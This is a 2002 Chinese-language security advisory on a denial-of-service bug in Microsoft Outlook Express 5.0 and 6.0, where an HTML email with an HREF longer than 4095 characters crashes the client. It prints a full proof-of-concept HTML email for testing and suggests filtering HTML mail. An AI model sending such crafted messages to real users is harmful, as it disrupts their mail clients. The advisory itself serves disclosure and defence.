发布日期：2002-09-09
更新日期：2002-09-12

受影响系统：

Microsoft Outlook Express 6.0
Microsoft Outlook Express 5.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3

描述：

---

Microsoft Outlook Express是一款流行的EMAIL客户端。

Outlook Express在处理超长HREF引用时存在问题，远程攻击者可以利用这个漏洞进行拒绝服务攻击。

Outlook Express在解析HREF引用时不够正确，远程攻击者可以发送包含HREF值超过4095字符的HTML形式EMAIL，可导致Outlook Express打开此邮件的时候崩溃。

不过不是在所有系统上都存在，可能是由于部分配置错误而导致的问题，尚未证实。

<*来源：Raistlin （raistlin@gioco.net）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103160282919223&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Raistlin （raistlin@gioco.net）提供了如下测试方法：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.3314.2100" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY>
<DIV><a href="123456789012345678901234567890123456789012345678901234567890123456789012 \
345678901234567890123456789C1234567890123456789012345678901234567890123456789012345678 \
90123456789012345678901234567890123456789C12345678901234567890123456789012345678901234 \
5678901234567890123456789012345678901234567890123456789C123456789012345678901234567890 \
123456789012345678901234567890123456789012345678901234567890123456789C1234567890123456 \
78901234567890123456789012345678901234567890123456789012345678901234567890123456789D12 \
34567890123456789012345678901234567890123456789012345678901234567890123456789012345678 \
90123456789C12345678901234567890123456789012345678901234567890123456789012345678901234 \
5678901234567890123456789C123456789012345678901234567890123456789012345678901234567890 \
123456789012345678901234567890123456789C1234567890123456789012345678901234567890123456 \
78901234567890123456789012345678901234567890123456789C12345678901234567890123456789012 \
3456789012345678901234567890123456789012345678901234 567890123456789M12345678
90123456789012345678901234567890123456789012345678901234567890123456789012345678901234 \
56789C12345678901234567890123456789012345678901234567890123456789012345678901234567890 \
1234567890123456789C123456789012345678901234567890123456789012345678901234567890123456 \
789012345678901234567890123456789C1234567890123456789012345678901234567890123456789012 \
34567890123456789012345678901234567890123456789C12345678901234567890123456789012345678 \
9012345678901234567890123456789012345678901234567890123456789D123456789012345678901234 \
567890123456789012345678901234567890123456789012345678901234567890123456789C1234567890 \
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456 \
789C1234567890123456789012345678901234567890123456789012345678901234567890123456789012 \
34567890123456789C12345678901234567890123456789012345678901234567890123456789012345678 \
9012345678901234567890123456789C123456789012345678901234567890123456789012345678901234 \
567890123456789012345678901234567890123456789M123456 789012345678901234567890
123456789012345678901234567890123456789012345678901234567890123456789C1234567890123456 \
78901234567890123456789012345678901234567890123456789012345678901234567890123456789C12 \
34567890123456789012345678901234567890123456789012345678901234567890123456789012345678 \
90123456789C12345678901234567890123456789012345678901234567890123456789012345678901234 \
5678901234567890123456789C123456789012345678901234567890123456789012345678901234567890 \
123456789012345678901234567890123456789D1234567890123456789012345678901234567890123456 \
78901234567890123456789012345678901234567890123456789C12345678901234567890123456789012 \
3456789012345678901234567890123456789012345678901234567890123456789C123456789012345678 \
901234567890123456789012345678901234567890123456789012345678901234567890123456789C1234 \
56789012345678901234567890123456789012345678901234567890123456789012345678901234567890 \
123456789C1234567890123456789012345678901234567890123456789012345678901234567890123456 \
78901234567890123456789M1234567890123456789012345678 901234567890123456789012
34567890123456789012345678901234567890123456789C12345678901234567890123456789012345678 \
9012345678901234567890123456789012345678901234567890123456789C123456789012345678901234 \
567890123456789012345678901234567890123456789012345678901234567890123456789C1234567890 \
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456 \
789C1234567890123456789012345678901234567890123456789012345678901234567890123456789012 \
34567890123456789D12345678901234567890123456789012345678901234567890123456789012345678 \
9012345678901234567890123456789C123456789012345678901234567890123456789012345678901234 \
567890123456789012345678901234567890123456789C1234567890123456789012345678901234567890 \
12345678901234567890123456789012345678901234567890123456789C12345678901234567890123456 \
7890123456789012345678901234567890123456789012345678901234567890123456789C123456789012 \
34567890123456789012345678901234567890123456789012345678901234567890123456789012345678 \
9M12345678901234567890123456789012345678901234567890 123456789012345678901234
5678901234567890123456"> test </a>
</DIV></BODY></HTML>

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 过滤所有HTML邮件到/dev/null。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

浏览次数：3875
严重程度：0（网友投票）